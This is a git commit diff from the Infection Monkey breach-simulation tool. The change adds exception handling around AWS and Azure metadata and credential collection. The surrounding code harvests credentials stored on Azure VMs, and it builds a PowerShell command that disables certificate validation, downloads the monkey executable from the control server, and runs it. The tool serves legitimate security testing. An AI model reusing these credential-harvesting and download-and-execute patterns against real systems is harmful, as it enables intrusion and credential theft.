Merge pull request #465 from guardicore/463/hotfix/exception-on-aws-network-error

ShayNehmad · web-flow · commit 55400078cef2 · 2019-10-13T12:38:14.000+03:00
463/hotfix/exception on aws network error -&gt; master
diff --git a/monkey/common/cloud/aws_instance.py b/monkey/common/cloud/aws_instance.py
@@ -29,14 +29,14 @@ def __init__(self):
                 AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read()
             self.region = self._parse_region(
                 urllib2.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read())
-        except urllib2.URLError as e:
-            logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e.message))
+        except (urllib2.URLError, IOError) as e:
+            logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e.message), exc_info=True)
 
         try:
             self.account_id = self._extract_account_id(
                 urllib2.urlopen(
                     AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read())
-        except urllib2.URLError as e:
+        except (urllib2.URLError, IOError) as e:
             logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e.message))
 
     @staticmethod
diff --git a/monkey/infection_monkey/system_info/__init__.py b/monkey/infection_monkey/system_info/__init__.py
@@ -113,7 +113,7 @@ def get_network_info(self):
         :return: None. Updates class information
         """
         LOG.debug("Reading subnets")
-        self.info['network_info'] =\
+        self.info['network_info'] = \
             {
                 'networks': get_host_subnets(),
                 'netstat': NetstatCollector.get_netstat_info()
@@ -122,28 +122,38 @@ def get_network_info(self):
     def get_azure_info(self):
         """
         Adds credentials possibly stolen from an Azure VM instance (if we're on one)
-        Updates the credentials structure, creating it if neccesary (compat with mimikatz)
+        Updates the credentials structure, creating it if necessary (compat with mimikatz)
         :return: None. Updates class information
         """
-        from infection_monkey.config import WormConfiguration
-        if not WormConfiguration.extract_azure_creds:
-            return
-        LOG.debug("Harvesting creds if on an Azure machine")
-        azure_collector = AzureCollector()
-        if 'credentials' not in self.info:
-            self.info["credentials"] = {}
-        azure_creds = azure_collector.extract_stored_credentials()
-        for cred in azure_creds:
-            username = cred[0]
-            password = cred[1]
-            if username not in self.info["credentials"]:
-                self.info["credentials"][username] = {}
-            # we might be losing passwords in case of multiple reset attempts on same username
-            # or in case another collector already filled in a password for this user
-            self.info["credentials"][username]['password'] = password
-        if len(azure_creds) != 0:
-            self.info["Azure"] = {}
-            self.info["Azure"]['usernames'] = [cred[0] for cred in azure_creds]
+        # noinspection PyBroadException
+        try:
+            from infection_monkey.config import WormConfiguration
+            if not WormConfiguration.extract_azure_creds:
+                return
+            LOG.debug("Harvesting creds if on an Azure machine")
+            azure_collector = AzureCollector()
+            if 'credentials' not in self.info:
+                self.info["credentials"] = {}
+            azure_creds = azure_collector.extract_stored_credentials()
+            for cred in azure_creds:
+                username = cred[0]
+                password = cred[1]
+                if username not in self.info["credentials"]:
+                    self.info["credentials"][username] = {}
+                # we might be losing passwords in case of multiple reset attempts on same username
+                # or in case another collector already filled in a password for this user
+                self.info["credentials"][username]['password'] = password
+            if len(azure_creds) != 0:
+                self.info["Azure"] = {}
+                self.info["Azure"]['usernames'] = [cred[0] for cred in azure_creds]
+        except Exception:
+            # If we failed to collect azure info, no reason to fail all the collection. Log and continue.
+            LOG.error("Failed collecting Azure info.", exc_info=True)
 
     def get_aws_info(self):
-        self.info['aws'] = AwsCollector().get_aws_info()
+        # noinspection PyBroadException
+        try:
+            self.info['aws'] = AwsCollector().get_aws_info()
+        except Exception:
+            # If we failed to collect aws info, no reason to fail all the collection. Log and continue.
+            LOG.error("Failed collecting AWS info.", exc_info=True)
diff --git a/monkey/monkey_island/cc/environment/aws.py b/monkey/monkey_island/cc/environment/aws.py
@@ -9,6 +9,7 @@
 class AwsEnvironment(Environment):
     def __init__(self):
         super(AwsEnvironment, self).__init__()
+        # Not suppressing error here on purpose. This is critical if we're on AWS env.
         self.aws_info = AwsInstance()
         self._instance_id = self._get_instance_id()
         self.region = self._get_region()
diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py
@@ -1,3 +1,5 @@
+import logging
+
 from monkey_island.cc.services.config import ConfigService
 from common.cloud.aws_instance import AwsInstance
 from common.cloud.aws_service import AwsService
@@ -7,6 +9,8 @@
 
 __author__ = "itay.mizeretz"
 
+logger = logging.getLogger(__name__)
+
 
 class RemoteRunAwsService:
     aws_instance = None
@@ -23,7 +27,15 @@ def init():
         :return: None
         """
         if RemoteRunAwsService.aws_instance is None:
+            RemoteRunAwsService.try_init_aws_instance()
+
+    @staticmethod
+    def try_init_aws_instance():
+        # noinspection PyBroadException
+        try:
             RemoteRunAwsService.aws_instance = AwsInstance()
+        except Exception:
+            logger.error("Failed init aws instance. Exception info: ", exc_info=True)
 
     @staticmethod
     def run_aws_monkeys(instances, island_ip):
@@ -119,7 +131,7 @@ def _get_run_monkey_cmd_windows_line(bit_text, island_ip):
         return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \
                r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \
                r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \
-               r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; "
+                                                                         r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; "
 
     @staticmethod
     def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip):
diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py
@@ -24,6 +24,7 @@ def handle_report(report_json):
             logger.info('No issues were found by the monkey, no need to send anything')
             return True
 
+        # Not suppressing error here on purpose.
         current_aws_region = AwsInstance().get_region()
 
         for machine in issues_list:
@@ -70,6 +71,7 @@ def _prepare_finding(issue, region):
         configured_product_arn = load_server_configuration_from_file()['aws'].get('sec_hub_product_arn', '')
         product_arn = 'arn:aws:securityhub:{region}:{arn}'.format(region=region, arn=configured_product_arn)
         instance_arn = 'arn:aws:ec2:' + str(region) + ':instance:{instance_id}'
+        # Not suppressing error here on purpose.
         account_id = AwsInstance().get_account_id()
         logger.debug("aws account id acquired: {}".format(account_id))
 
diff --git a/monkey/monkey_island/cc/services/reporting/exporter_init.py b/monkey/monkey_island/cc/services/reporting/exporter_init.py
@@ -9,11 +9,18 @@
 
 def populate_exporter_list():
     manager = ReportExporterManager()
-    RemoteRunAwsService.init()
-    if RemoteRunAwsService.is_running_on_aws() and ('aws' == env.get_deployment()):
-        manager.add_exporter_to_list(AWSExporter)
+    try_add_aws_exporter_to_manager(manager)
 
     if len(manager.get_exporters_list()) != 0:
         logger.debug(
             "Populated exporters list with the following exporters: {0}".format(str(manager.get_exporters_list())))
 
+
+def try_add_aws_exporter_to_manager(manager):
+    # noinspection PyBroadException
+    try:
+        RemoteRunAwsService.init()
+        if RemoteRunAwsService.is_running_on_aws() and ('aws' == env.get_deployment()):
+            manager.add_exporter_to_list(AWSExporter)
+    except Exception:
+        logger.error("Failed adding aws exporter to manager. Exception info:", exc_info=True)
